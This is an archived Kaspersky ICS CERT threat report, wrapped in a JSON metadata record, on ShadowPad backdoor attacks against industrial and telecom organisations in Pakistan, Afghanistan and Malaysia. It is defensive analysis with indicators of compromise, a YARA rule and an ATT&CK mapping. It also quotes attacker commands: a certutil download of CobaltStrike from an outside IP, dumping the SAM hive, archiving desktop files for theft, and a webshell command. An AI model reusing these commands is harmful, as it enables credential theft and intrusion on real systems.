{ "id": "5b6bf0b2-9268-466f-9b60-b109d0791572", "created_at": "2026-04-06T00:12:56.431473Z", "updated_at": "2026-04-10T13:12:04.97088Z", "deleted_at": null, "sha1_hash": "c23f5a16e0c9d8e1cc24ba947efd40fc29a2009b", "title": "Attacks on industrial control systems using ShadowPad | Kaspersky ICS CERT EN", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1034405, "plain_text": "Attacks on industrial control systems using ShadowPad |\r\nKaspersky ICS CERT EN\r\nBy Kaspersky ICS CERT Team\r\nPublished: 2022-06-27 · Archived: 2026-04-05 22:54:55 UTC\r\nExecutive summary\r\nInitial infection\r\nShadowPad\r\nPost-exploitation\r\nAdditional tools\r\nCobaltStrike\r\nPlugX backdoor – aro.dat\r\nBat file for credential theft\r\nWebshell\r\nInfrastructure\r\nVictims\r\nAttribution\r\nConclusion\r\nAppendix I – Indicators of Compromise\r\nAppendix II – MITRE ATT\u0026CK Mapping\r\nExecutive summary\r\nIn mid-October 2021 Kaspersky ICS CERT researchers uncovered an active ShadowPad backdoor infection on\r\nindustrial control systems (ICS) in Pakistan. Infected machines included engineering computers in building\r\nautomation systems that are part of the infrastructure of a telecommunications company.\r\nDuring the investigation researchers uncovered larger-scale activity by the threat actor in the network of the\r\ntelecommunications company and also identified other victims of the campaign. We found malicious artifacts in\r\norganizations in the industrial and telecommunications sectors in both Pakistan and Afghanistan. Moreover,\r\nanother attack was uncovered, using an earlier, but with very similar set of tactics, techniques and procedures\r\n(TTPs), against a logistics and transport organization (a port) in Malaysia.\r\nApparently, the wave of attacks uncovered by the experts began in March 2021.\r\nSome of the victim organizations were breached by exploiting the CVE-2021-26855 vulnerability in Microsoft\r\nExchange.\r\nDuring the investigation we found additional tools and commands used by the threat actor after the initial\r\ninfection.\r\nhttps://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/\r\nPage 1 of 12\n\nFrom March to October 2021, the ShadowPad backdoor was downloaded to victim computers as the\r\nmscoree.dll file, which was launched by AppLaunch.exe – a perfectly legitimate application.\r\nLater the attackers launched ShadowPad using DLL hijacking in a legitimate OLE-COM object viewing\r\napplication (OleView).\r\nAfter the initial infection the attackers first sent commands manually, then automatically.\r\nOther tools were also used:\r\nThe CobaltStrike framework, which was downloaded to victim machines using the certutil.exe\r\nutility, compiled aspx web shells, and procdump and Mimikatz tools;\r\nThe PlugX backdoor;\r\nBAT files (for stealing credentials);\r\nWeb shells (for remote access to the web server);\r\nThe Nextnet utility (for scanning network hosts).\r\nThe attackers used domains registered with NameSilo, GoDaddy.com and ENOM to communicate with the\r\ncommand-and-control (C2) servers. Most of the C2 servers were hosted on dedicated servers rented from Choopa.\r\nThe newly identified attacks on a variety of organizations had an almost totally unique set of TTPs, which leads us\r\nto believe that the same Chinese-speaking threat actor was behind all of these attacks.\r\nAt the time of writing, we do not know the ultimate goal of the attacker. We think it was probably data harvesting.\r\nWe believe that it is highly likely that this threat actor will strike again and we will find new victims in different\r\ncountries.\r\nThe full report is available on the Kaspersky Threat Intelligence portal.\r\nFor more information please contact ics-cert@kaspersky.com.\r\nInitial infection\r\nIn mid-October 2021, Kaspersky ICS CERT experts discovered an active ShadowPad backdoor that affected a\r\nnumber of industrial control systems in Pakistan, specifically engineering computers in building automation\r\nsystems that are part of a telecom company’s infrastructure. A further analysis of the attack revealed other\r\norganizations affected by it – manufacturing and telecommunications companies in Pakistan, a telecomnunications\r\ncompany in Afghanistan, and a logistics and transport organization (a port) in Malaysia. Apparently, the wave of\r\nattacks uncovered by the experts began in March 2021.\r\nThe attackers exploited a known vulnerability in MS Exchange, CVE-2021-26855, as the initial attack vector in\r\nseveral victim organizations. We do not have evidence that CVE-2021-26855 was exploited in all cases of attack\r\nidentified, but we can assume that the attackers could use this particular vector to penetrate in other cases, as well.\r\nIn the course of our investigation, we determined that in the beginning of March 2021, the ShadowPad backdoor\r\nwas downloaded on the attacked computers under the guise of the mscoree.dll file, which was launched by the\r\nlegitimate application AppLaunch.exe located in the same folder with ShadowPad. AppLaunch.exe was executed\r\nby creating a task in the Windows Task Scheduler.\r\nhttps://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/\r\nPage 2 of 12\n\nExport table of the mscoree.dll (ShadowPad) maliciouis DLL\r\nIn some of the cases we studied at the same time, we found that a ShadowPad sample that had the same name and\r\nlaunching scheme was executed by exploiting the MS Exchange CVE-2021-26855 vulnerability.\r\nSince about mid-October 2021, a new ShadowPad launching scheme and a new version of the malware has been\r\nused targeting the same organizations. Instead of using mscoree.dll, the attackers switched to using the dll\r\nhijacking technique in legitimate software for viewing OLE-COM objects (OleView). The legitimate OleView\r\napplication downloads the malicious IVIEWERS.dll library, which in turn downloads and executes the\r\nShadowPad payload contained in IVIEWERS.dll.dat.\r\nThe Windows Task Scheduler was also used for the new ShadowPad version to get a foothold in a system. In total,\r\nwe managed to find 25 unique modifications.\r\nA more detailed analysis of some modifications of the new ShadowPad version is presented in a recent report\r\npublished by PwC.\r\nPost-exploitation\r\nWe found that on a subset of computers (at least one in each attacked organization’s network), some series of\r\ncommands had been remotely executed via the command line interface (cmd.exe).\r\nAt first, the attackers entered the commands manually (this is indicated by both the time intervals between\r\ncommands and the resulting output not being redirected to anything other than standard output).\r\nThe list of commands executed by the attackers manually is shown in the original sequence in the table below.\r\nCommand Description\r\ncmd.exe /C arp -a \u003e $temp\\gGjrIFGa.tmp 2\u003e\u00261\r\noutput the current ARP cache\r\ntable for all interfaces to a file in\r\nthe $temp directory\r\nhttps://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/\r\nPage 3 of 12\n\nCommand Description\r\nquser.exe\r\ncollect information about users\r\nauthorized in the system\r\nnetstat -ano\r\nnetstat user\r\ncollect information about active\r\nusers and network connections\r\nxcopy.exe /s $user\\desktop c:\\$recycle.bin\\temp\\■■■\\\r\ncopy all files from the desktop to\r\nthe recycle.bin folder (it is worth\r\nnoting that the organization’s\r\ndomain name is also present in\r\nthe path)\r\nping.exe 8,8,8,8\r\nping.exe google.com\r\nping.exe 167.179.64.62\r\ncheck the availability of internet\r\nservices, probably including the\r\nattackers’ infrastructure\r\nnet use \\\\10.126.209.24 “■■■■■■■” /u:■■\\■■■■■\r\nmount a network drive using a\r\nlegitimate domain account\r\ncmd.exe m1.log\r\nlaunch Trojan-PSW.Win32.Mimikatz\r\nreg.exe save hklm\\sam sam.hive\r\nsave registry key containing\r\nNTLM hashes to disk\r\ncmd.exe /C $programfiles\\winrar\\rar.exe a -r -hp1234\r\nC:$recycle.bin\\10020111desk.rar $user\\desktop\\*.txt\r\n$user\\desktop\\*.xls* $user\\desktop\\*.pdf\r\n$user\\desktop\\*.doc* $user\\desktop\\*.jpg \u003e\r\n$temp\\lwefqERM.tmp 2\u003e\u00261\r\narchive the files collected that\r\npotentially contain confidential\r\ninformation\r\nwinrar.exe a -r -ep1 -p3210 -m5 -s  -iback nat temp\r\narchive the files collected using\r\nthe console version of WinRar\r\n$windir\\appcompat\\programs\\xerice.exe 10.251.115.0/24\r\nscan hosts on the network using\r\nthe nextnet utility (an open-source tool written in Go)\r\nLater, the attackers began to distribute a malicious script for cmd.exe over the networks of attacked organizations.\r\nThe script was almost completely identical (in terms of its contents and the sequence of commands) to the manual\r\nactivity sequence detected earlier, but it contained an operator to redirect the output of execution results to a file.\r\nThe script for cmd.exe that was discovered  was not only delivered over the network, but was also added by the\r\nattackers to the task scheduler for daily execution.\r\nhttps://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/\r\nPage 4 of 12\n\nExample of a script designed to automate the process of collecting data on attacked computers\r\nIt is important to note that this part of the TTPs is quite unique and we believe it supports attributing all cases of\r\nsimilar activity to one Chinese-speaking group of attackers.\r\nThe artifacts found indicate that the attackers stole domain authentication credentials from at least one account in\r\neach attacked organization (probably from the same computer that was used to penetrate the network). These\r\ncredentials were used to further spread the attack over the network, first manually and then in automatic mode.\r\nAdditional tools\r\nCobaltStrike\r\nThe attackers used CobaltStrike, which was downloaded to the victim’s computer using the certutil.exe utility,\r\ncompiled aspx webshells, the procdump tool, and Mimikatz.\r\nCobaltStrike was downloaded using the following command:\r\n\"$system32\\cmd.exe\" /c certutil.exe -urlcache -split -f hxxp://116.206.92[.]26:82/update.exe \u0026amp;\u0026am\r\nPlugX backdoor – aro.dat\r\nIn addition to the ShadowPad backdoor, activity associated with downloading aro.dat, a variant of the PlugX\r\nbackdoor, using bitsadmin was identified on the server of one of the victims.\r\nDownloading aro.dat backdoor\r\nA description of the PlugX backdoor is provided in an article published by Palo Alto Networks.\r\nBat file for credential theft\r\nA bat file was found on a mail server of one of the victims, which the attackers used to collect information and\r\nsteal the NTLM hashes of accounts.\r\nhttps://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/\r\nPage 5 of 12\n\nBat file found on a victim’s server\r\nThe contents of this file are very similar to the bat file described in a VB article, which mentions that the script\r\nwas used by the Chinese group HAFNIUM.\r\nWebshell\r\nMalicious dll files were found on the victim’s mail servers. These are compiled .NET Assembly files for aspx\r\nscripts used by the actor for remote access to the web server (webshell).\r\nExample of malicious dll webshell\r\nThe sequence of commands sent by default to the victim’s webshell was tracked earlier in the well-known China\r\nChopper Webshell:\r\n\"cmd\" /c cd /d \"C:/inetpub/wwwroot/aspnet_client\"\u0026amp;whoami\u0026amp;echo [S]\u0026amp;cd\u0026amp;echo [E]\"\r\nInfrastructure\r\nThe ShadowPad CnC servers found are mostly hosted on rented dedicated Choopa servers.\r\nhttps://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/\r\nPage 6 of 12\n\nDomain IP First seen ASN\r\norder.cargobussiness[.]site 45.77.249[.]48 March 24, 2021 20473\r\ndocuments.kankuedu[.]org 45.76.54[.]156 March 23, 2021 20473\r\nlive.musicweb[.]xyz 192.248.151[.]110 March 17, 2021  \r\nobo.videocenter[.]org – May 21, 2021  \r\ntech.obj[.]services\r\n108.160.133[.]247\r\n103.152.255[.]82\r\nOctober 21, 2021\r\nOctober 18, 2021\r\n20473\r\nhouwags.defineyourid[.]site\r\n107.191.47[.]52\r\n198.13.44[.]48\r\n95.179.142[.]104\r\nOctober 28, 2021\r\nOctober 13, 2021\r\nOctober 29, 2021\r\n20473\r\nnoub.crabdance[.]com\r\n45.77.243[.]204\r\n45.32.101[.]196\r\n95.179.142[.]104\r\n192.248.180[.]109\r\nOctober 02, 2021\r\nOctober 19, 2021\r\nOctober 28, 2021\r\nOctober 28, 2021\r\n20473\r\ngrandfoodtony[.]com –\r\nVictims\r\nWe identified malicious artifacts in organizations located in Pakistan and Afghanistan and operating in\r\nmanufacturing \u0026 telecom sectors. The attack using older TTPs and exploiting the Microsoft Exchange\r\nvulnerability also targeted a logistics and transportation organization (a port) in Malaysia.\r\nAttribution\r\nWe believe with a high degree of confidence that a Chinese-speaking threat actor is behind the activity described\r\nin this report.\r\nThere are some minor references to HAFNUIM, a Chinese-speaking threat actor, but they are not sufficient to\r\nspeak of HAFNUM’s involvement in attacks described in this report with a high degree of confidence.\r\nThe Mimikatz utility (m1.log, SHA256:\r\n30a78770615c6b42c17900c4ad03a9b708dc2d9b743bbdc51218597518749382), which was identified\r\nduring our investigation on computers of organizations in Pakistan, Malaysia, and Afghanistan, was also\r\nmentioned in a Symantec report. The report also claims that the threat actor HAFNIUM was involved in\r\nattacks exploiting a Microsoft Exchange Server vulnerability.\r\nIn addition, a bat file for stealing NTLM hashes of accounts was found on a server of one of the victims.\r\nThe contents of the bat file found are very similar to the bat file described in the VB article, which\r\nmentions that this script was used by HAFNIUM.\r\nhttps://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/\r\nPage 7 of 12\n\nActivity related to downloading the PlugX backdoor (aro.dat), which occurred on the server of one of the victims,\r\nwas analyzed in the Palo Alto Networks report, which alleges the involvement of a Chinese group known as\r\nPKPLUG.\r\nConclusion\r\nAs mentioned above, building automation systems were among the systems attacked in the campaign described in\r\nthis report. We often see accidental infections on such systems, but they are rare targets for APT actors. Although\r\nthe final goals of the attack remain unknown, the attackers are most likely interested in gathering information. We\r\nstrongly believe that those systems themselves could be a valuable source of highly confidential information.\r\nAdditionally, we believe there is a chance that they also provide attackers with a backdoor to other, more strictly\r\nsecured, infrastructure.\r\nThe attackers’ TTPs enabled us to link these attacks to a Chinese-speaking threat actor, and we observed victims\r\nlocated in different regions. This means that the actor we have identified may have broader geographical interests\r\nand we could expect more victims to be discovered in different countries in the future.\r\nAppendix I – Indicators of Compromise\r\nShadowPad (mscoree.dll)\r\n91131CCF507F61279268FA857AB53463\r\n8D5807D8EE69E472764FAEE7269B460B\r\n1A5856C343597DC219E3F5456018612B\r\n27F636A36207581E75C700C0E36A8031\r\nShadowPad (iviewers.dll)\r\n011BEAF3E9CD2896479313772CD591DE\r\nA7F3BF89F0B41704F185545C784B8457\r\n35912C914BD84F23203C8FADAC6D0548\r\n299980C914250BAC7522DE849F6DF24F\r\n381616642D2567F8872B150B37E5196B\r\n31FDAE0B71C290440E0B465B17CF3C8D\r\n420FCF11240589E8D29DAAB08251831D\r\n40CD646554ED42D385CA6B55B9D3397D\r\n61BA23B3B3D132FE0825907C0EA58399\r\n0CAC537476FD71763C07EDFD7D831F0F\r\n80EE7A1E9AD4AC6AFCAC83087DC5360F\r\nBat file for credential theft:\r\n74E43ECA18E8C92CB332BBB671CE13B8\r\nhttps://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/\r\nPage 8 of 12\n\nTrojan-PSW.Win32.Mimikatz.eni (m1.log)\r\nC024E5163AB6DD844813BF0D9A6F082B\r\nNextnet (xerice.exe)\r\n86B25E416EEE0F5FB17370F3929E45F4\r\n8EE863C926D6847D1BF767783E700248\r\nDomains and IPs (ShadowPad C\u0026C)\r\nhttps://order.cargobussiness[.]site\r\nhttps://documents.kankuedu[.]org\r\nhttps://live.musicweb[.]xyz\r\nhttps://obo.videocenter[.]org\r\nhttps://tech.obj[.]services\r\nhttps://houwags.defineyourid[.]site\r\nhttps://noub.crabdance[.]com\r\nhttps://grandfoodtony[.]com\r\nCobaltStrike hosting and C\u0026C\r\nstorage.ondriev[.]tk 116.206.92[.]26\r\napi.onedriev[.]tk 69.172.80[.]131\r\nYara rule (update)\r\nWe would like to thank John Southworth (@BitsOfBinary) from PwC for suggesting improvements to the YARA\r\nrule.\r\nimport \"pe\"\r\nrule apt_shadowpad_iviewers_dll_variant\r\n{\r\nmeta:\r\n description = \"Rule for detecting Shadowpad iviewers.dll variant\"\r\n author = \"Kaspersky\"\r\n copyright = \"Kaspersky\"\r\n distribution = \"DISTRIBUTION IS FORBIDDEN. DO NOT UPLOAD TO ANY MULTISCANNER OR SHARE ON ANY THRE\r\n version = \"1.0\"\r\n last_modified = \"2022-01-20\"\r\n hash = \"011BEAF3E9CD2896479313772CD591DE\"\r\n hash = \"A7F3BF89F0B41704F185545C784B8457\"\r\n hash = \"35912C914BD84F23203C8FADAC6D0548\"\r\n hash = \"299980C914250BAC7522DE849F6DF24F\"\r\nhttps://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/\r\nPage 9 of 12\n\nstrings:\r\n $viewers = \"VIEWER.dll\" fullword\r\n $Iviewers = \"IVIEWERS.dll\"\r\n $oleview = \"OLEViewer\"\r\n $comapi = \"viewer Copyright\" wide\r\ncondition:\r\n uint16(0) == 0x5A4D and filesize \u003c 2MB and pe.is_dll() and ($Iviewers or $comapi or $viewers) and\r\n(\r\n not for any i in (0 .. pe.number_of_signatures) : (pe.signatures[0].subject contains \"O=Microsoft\r\n and not $oleview\r\n )\r\n}\r\nAppendix II – MITRE ATT\u0026CK Mapping\r\nThis table contains all the TTPs identified in the analysis of the activity described in this report.\r\nTactic Technique Technique Name\r\nExecution\r\nT1059.001\r\nCommand and Scripting Interpreter: PowerShell\r\nThe attacker uses a PowerShell script to download and execute additional\r\npayloads.\r\nT1053.005\r\nScheduled Task\r\nThe attacker creates scheduled tasks for daily execution of malicious\r\npayloads.\r\nT1047\r\nWindows Management Instrumentation\r\nThe attacker creates a WMI event to execute an information gathering\r\ntool on startup.\r\nPersistence\r\nT1197\r\nBITS Jobs\r\nThe attacker uses a BITS job to download additional payloads.\r\nT1574.002\r\nHijack Execution Flow: DLL Side-Loading\r\nThe attacker leverages a legitimate binary to load ShadowPad.\r\nT1053.005\r\nScheduled Task\r\nThe attacker creates scheduled tasks to set up daily execution of\r\nmalicious payloads.\r\nDefense Evasion\r\nT1197\r\nBITS Jobs\r\nThe attacker uses a BITS job to download additional payloads.\r\nhttps://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/\r\nPage 10 of 12\n\nTactic Technique Technique Name\r\nT1140\r\nDeobfuscate/Decode Files or Information\r\nDownloaded tools are encoded with base64\r\nT1222.001\r\nFile and Directory Permissions Modification\r\nThe attacker uses attrib to change the permissions of the malicious files\r\nand the working directory to hide them.\r\nT1564.001\r\nHide Artifacts\r\nThe attacker uses attrib to change the permissions of the malicious files\r\nand the working directory to hide them.\r\nT1574.002\r\nHijack Execution Flow: DLL Side-Loading\r\nThe attacker leverages a legitimate binary to load ShadowPad.\r\nDiscovery\r\nT1083\r\nFile and Directory Discovery\r\nThe attacker lists files and directories available on infected systems.\r\nT1046\r\nNetwork Service Scanning\r\nThe attacker uses a pentesting tool to list the NETBIOS services.\r\nT1012\r\nQuery Registry\r\nThe attacker queries the registry to get a history of connected USB\r\ndevices.\r\nCollection\r\nT1560.002\r\nArchive Collected Data: Archive via Utility\r\nThe attacker uses the rar tool to create a password-protected archive.\r\nT1560.002\r\nArchive Collected Data: Archive via Library\r\nThe attacker compresses the data with a password using the Zip library.\r\nT1119\r\nAutomated Collection\r\nThe attacker automatically collects a list of files and connected USB\r\ndevices.\r\nT1005\r\nData from Local System\r\nThe attacker uses a PowerShell script to collect Office documents on the\r\nlocal system.\r\nT1114.001\r\nEmail Collection: Local Email Collection\r\nThe attacker specifically exfiltrates .pst archives.\r\nCommand and\r\nControl T1071.001\r\nApplication Layer Protocol: Web Protocols\r\nThe attacker uses web protocols to download additional tools, exfiltrate\r\ndata and operate the malware.\r\nhttps://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/\r\nPage 11 of 12\n\nTactic Technique Technique Name\r\nT1132.001\r\nData Encoding: Standard Encoding\r\nThe data is encoded using compression with a password.\r\nT1090.001\r\nProxy: Internal Proxy\r\nThe attacker uses netcat and Stowaway-Node to create tunnels inside the\r\nvictim network.\r\nT1090.002\r\nProxy: External Proxy\r\nThe attacker uses netcat and Stowaway-Node to create tunnels to the\r\noutside of the network.\r\nExfiltration\r\nT1020\r\nAutomated Exfiltration\r\nThe attacker can automatically exfiltrate Office documents.\r\nT1041\r\nExfiltration Over C2 Channel\r\nThe attacker exfiltrates data over the C2 channel.\r\nT1567.002\r\nExfiltration Over Web Service: Exfiltration to Cloud Storage\r\nThe attacker exfiltrates data to Google Drive.  \r\nAuthors\r\nKirill Kruglov\r\nSenior Research Developer, Kaspersky ICS CERT\r\nArtem Snegirev\r\nSecurity Researcher, Kaspersky ICS CERT\r\nSource: https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/\r\nhttps://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/\r\nPage 12 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/" ], "report_names": [ "attacks-on-industrial-control-systems-using-shadowpad" ], "threat_actors": [ { "id": "93542ae8-73cb-482b-90a3-445a20663f15", "created_at": "2022-10-25T16:07:24.058412Z", "updated_at": "2026-04-10T02:00:04.853499Z", "deleted_at": null, "main_name": "PKPLUG", "aliases": [ "Stately Taurus" ], "source_name": "ETDA:PKPLUG", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "7c969685-459b-4c93-a788-74108eab6f47", "created_at": "2023-01-06T13:46:39.189751Z", "updated_at": "2026-04-10T02:00:03.241102Z", "deleted_at": null, "main_name": "HAFNIUM", "aliases": [ "Red Dev 13", "Silk Typhoon", "MURKY PANDA", "ATK233", "G0125", "Operation Exchange Marauder" ], "source_name": "MISPGALAXY:HAFNIUM", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "2704d770-43b4-4bc4-8a5a-05df87416848", "created_at": "2022-10-25T15:50:23.306305Z", "updated_at": "2026-04-10T02:00:05.296581Z", "deleted_at": null, "main_name": "HAFNIUM", "aliases": [ "HAFNIUM", "Operation Exchange Marauder", "Silk Typhoon" ], "source_name": "MITRE:HAFNIUM", "tools": [ "Tarrask", "ASPXSpy", "Impacket", "PsExec", "China Chopper" ], "source_id": "MITRE", "reports": null }, { "id": "529c1ae9-4579-4245-86a6-20f4563a695d", "created_at": "2022-10-25T16:07:23.702006Z", "updated_at": "2026-04-10T02:00:04.71708Z", "deleted_at": null, "main_name": "Hafnium", "aliases": [ "G0125", "Murky Panda", "Red Dev 13", "Silk Typhoon" ], "source_name": "ETDA:Hafnium", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "2ee03999-5432-4a65-a850-c543b4fefc3d", "created_at": "2022-10-25T16:07:23.882813Z", "updated_at": "2026-04-10T02:00:04.776949Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Bronze President", "Camaro Dragon", "Earth Preta", "G0129", "Hive0154", "HoneyMyte", "Mustang Panda", "Operation SMUGX", "Operation SmugX", "PKPLUG", "Red Lich", "Stately Taurus", "TEMP.Hex", "Twill Typhoon" ], "source_name": "ETDA:Mustang Panda", "tools": [ "9002 RAT", "AdFind", "Agent.dhwf", "Agentemis", "CHINACHOPPER", "China Chopper", "Chymine", "ClaimLoader", "Cobalt Strike", "CobaltStrike", "DCSync", "DOPLUGS", "Darkmoon", "Destroy RAT", "DestroyRAT", "Farseer", "Gen:Trojan.Heur.PT", "HOMEUNIX", "Hdump", "HenBox", "HidraQ", "Hodur", "Homux", "HopperTick", "Hydraq", "Impacket", "Kaba", "Korplug", "LadonGo", "MQsTTang", "McRAT", "MdmBot", "Mimikatz", "NBTscan", "NetSess", "Netview", "Orat", "POISONPLUG.SHADOW", "PUBLOAD", "PVE Find AD Users", "PlugX", "Poison Ivy", "PowerView", "QMAGENT", "RCSession", "RedDelta", "Roarur", "SPIVY", "ShadowPad Winnti", "SinoChopper", "Sogu", "TIGERPLUG", "TONEINS", "TONESHELL", "TVT", "TeamViewer", "Thoper", "TinyNote", "WispRider", "WmiExec", "XShellGhost", "Xamtrav", "Zupdax", "cobeacon", "nbtscan", "nmap", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434376, "ts_updated_at": 1775826724, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c23f5a16e0c9d8e1cc24ba947efd40fc29a2009b.pdf", "text": "https://archive.orkl.eu/c23f5a16e0c9d8e1cc24ba947efd40fc29a2009b.txt", "img": "https://archive.orkl.eu/c23f5a16e0c9d8e1cc24ba947efd40fc29a2009b.jpg" } }